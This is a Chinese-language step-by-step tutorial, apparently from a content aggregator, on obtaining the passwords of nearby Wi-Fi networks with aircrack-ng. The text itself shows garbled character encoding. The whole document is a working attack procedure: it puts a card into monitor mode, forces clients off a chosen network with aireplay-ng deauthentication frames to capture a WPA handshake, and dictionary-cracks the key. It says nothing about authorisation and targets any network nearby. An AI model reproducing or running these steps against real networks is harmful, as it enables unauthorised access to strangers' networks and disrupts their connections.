提示：下面的所有命令都以root用戶執(zhí)行

一、關(guān)閉網(wǎng)絡(luò)和結(jié)束可能會(huì)影響結(jié)果的進(jìn)程

1、關(guān)閉網(wǎng)絡(luò)

1	service network-manager stop

2、結(jié)束可能會(huì)影響結(jié)果的進(jìn)程

1	airmon-ng check kill

二、開(kāi)啟無(wú)線網(wǎng)卡到監(jiān)聽(tīng)模式

1、查看網(wǎng)卡列表

1

iwconfig

說(shuō)明：以wlan0和wlan1是無(wú)線網(wǎng)卡，我的電腦上有兩張無(wú)線網(wǎng)卡

2、啟動(dòng)網(wǎng)卡到監(jiān)聽(tīng)模式(這里使用wlan0)

1	airmon-ng start wlan0

說(shuō)明：如上圖表示啟動(dòng)成功，啟動(dòng)后會(huì)給出一個(gè)新的名稱接口名，上圖中的是mon0

三、監(jiān)聽(tīng)周圍的無(wú)線網(wǎng)絡(luò)連接并獲取握手信息

1、監(jiān)聽(tīng)周圍所有無(wú)線網(wǎng)絡(luò)信息

1	airodump-ng mon0

在這條命令中mon0是上一步中我們得到的接口名

說(shuō)明：圖下半部分，列BSSID下要有非(not associated)行才行，上圖中最后一行就是:

1	C0:XX:XX:XX:XX:00??? 14:XX:XX:XX:XX:B4??? -87???????? 0 - 1??????? 3??????? 2

這時(shí)，記下C0:XX:XX:XX:XX:00，并在圖的上半部分中找對(duì)應(yīng)C0:XX:XX:XX:XX:00行，記下CH列下的值為1。然后關(guān)閉此窗口。

2、監(jiān)聽(tīng)感興趣的無(wú)線網(wǎng)絡(luò)

根據(jù)上一步的結(jié)果執(zhí)行如下命令:

1	airodump-ng --bssid C0:XX:XX:XX:XX -c 1 -w tmp mon0

在這條命令中--bssid后接我們上一部接下的BSSID值，即：C0:XX:XX:XX:XX:00。而-c后接的是我上一步在CH列下找到的值1。而-w后接的是我們保存網(wǎng)絡(luò)數(shù)據(jù)的文件名，這里是用tmp。在命令的最后接的是之前得到的mon0

運(yùn)行命令后會(huì)得到上圖的結(jié)果，并確保上圖的下半部分BSSID下有至少一行的數(shù)據(jù)

3、得到握手包

保持上一步中的窗口不關(guān)，新開(kāi)一個(gè)窗口，執(zhí)行如下命令：

1	aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 mon0

在這條命令中參數(shù)-a后接的是上圖中下半部分BSSID列下第一行的的值C0:XX:XX:XX:XX:00。參數(shù)-c后接的是上圖中下半部分STATION列下第一行的的值14:XX:XX:XX:XX:B4。mon是之前步驟得到的值。執(zhí)行后：

觀察我們步驟2中未關(guān)閉的窗口中是否出現(xiàn)了下圖中紅款中的內(nèi)容。如果沒(méi)有出現(xiàn)那就再等幾分鐘再次執(zhí)行本步驟中的命令，直到出現(xiàn)。如果執(zhí)行了超過(guò)30次或者時(shí)間超過(guò)30分鐘依然沒(méi)有出現(xiàn)，建議換一個(gè)感興趣的網(wǎng)絡(luò)。

出現(xiàn)了上圖中紅框中的內(nèi)容，就表示我們已經(jīng)獲取到了握手信息（包含有該網(wǎng)絡(luò)密碼的數(shù)據(jù)）。那么我們就可以結(jié)束監(jiān)聽(tīng)網(wǎng)絡(luò)了。

四、停止監(jiān)聽(tīng)

1、關(guān)閉監(jiān)聽(tīng)接口

1	airmon-ng stop mon0

2、啟動(dòng)網(wǎng)絡(luò)

1	service network-manager start

五、獲取密碼

此時(shí)在執(zhí)行第3.2步驟中命令的目錄下會(huì)有一個(gè)tmp-01.cap文件。有了這個(gè)文件我們就可以破解密碼了，除了這個(gè)文件外，我們還需要一個(gè)字典文件。可以從這里下載，下載后解壓出密碼文件，假設(shè)其名字及路徑為:/tmp/passwd.txt。執(zhí)行下面的命令。如果密碼字典中有這個(gè)wifi的密碼，我們就可以破解出密碼:

1	aircrack-ng tmp-01.cap -w /tmp/passwd.txt

破解成功后會(huì)出現(xiàn)下圖：

KEY FOUND!后中括號(hào)中間就是wifi密碼了

六、可能出現(xiàn)的問(wèn)題

1、收到on channel -1的錯(cuò)誤

第3.3步執(zhí)行

1	aireplay-ng -0 2 -a C0:XX:XX:XX:XX:00 -c 14:XX:XX:XX:XX:B4 mon0

提示錯(cuò)誤：

1 2 3

11:41:04? Waiting for beacon frame (BSSID:? XX:XX:XX:XX:XX:XX) on channel -1 11:41:04? Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch Please specify an ESSID (-e).

解決辦法：

（1）確保第3.1步中的窗口被關(guān)閉了的

（2）確保執(zhí)行的3.2步中的命令，且名稱中有參數(shù)-c且參數(shù)-c后的數(shù)值是正確的(參數(shù)-c 1是為了把mon0的頻道鎖定在頻道1)

（3）如果依然不能解決，那可能就是驅(qū)動(dòng)問(wèn)題了，就像我的電腦，在kali3.14上能正常，但在3.20上一直有問(wèn)題

總結(jié)

以上是生活随笔為你收集整理的利用aircrack-ng工具获取附近wifi的密码的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。